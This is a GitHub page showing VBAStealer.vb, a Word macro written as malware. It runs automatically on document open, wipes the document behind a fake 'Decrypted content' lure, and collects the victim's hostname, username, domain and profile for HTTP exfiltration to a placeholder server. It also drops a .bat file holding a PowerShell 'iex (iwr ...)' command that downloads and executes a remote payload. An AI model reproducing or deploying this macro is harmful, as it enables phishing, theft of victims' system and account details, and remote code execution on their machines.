-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathVBAStealer.vb
50 lines (47 loc) · 1.53 KB
/
VBAStealer.vb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Sub AutoOpen()
DeleteAndDecrypt
VBAStealer
End Sub
Sub DeleteAndDecrypt()
'Delete encrypted content after enabling macros
ActiveDocument.Content.Select
Selection.Delete
Selection.InsertBefore Text:="Decrypted content!!!"
End Sub
Public Function Exer(url As String)
With CreateObject("WinHttp.WinHttpRequest.5.1")
.Open "GET", url, False
.setRequestHeader "User-Agent", "EvilMacroV1.0"
.Send
End With
End Function
Sub VBAStealer()
Dim hostname As String
Dim username As String
Dim domain As String
hostname = Environ("COMPUTERNAME")
username = Environ("USERNAME")
domain = Environ("USERDOMAIN")
profile = Environ("USERPROFILE")
username = username + "/" + domain
Dim url As String
Dim Ip As String
server1 = "<SERVERIP>"
server2 = "<SERVERIP>"
url = server1 + server2 + "?" + "hostname=" + hostname + "&" + "username=" + username + "&" + "domain=" + domain + "&" + "profile=" + "profile"
Dim res As String
' exfiltrate data using HTTP
'res = Exer(url)
MsgBox ("You can now view the file!")
' Create a file dropper
Dim filePath As String
filePath = "<FILEPATH>" ' make a .txt file
Dim fso As FileSystemObject
Set fso = New FileSystemObject
Dim fileStream As TextStream
Set fileStream = fso.CreateTextFile(filePath)
fileStream.WriteLine "powershell.exe iex (iwr http://<IP_ADDRESS>/MalTest)"
fileStream.Close
Name filepath As filepath.bat
' execute bat file
End Sub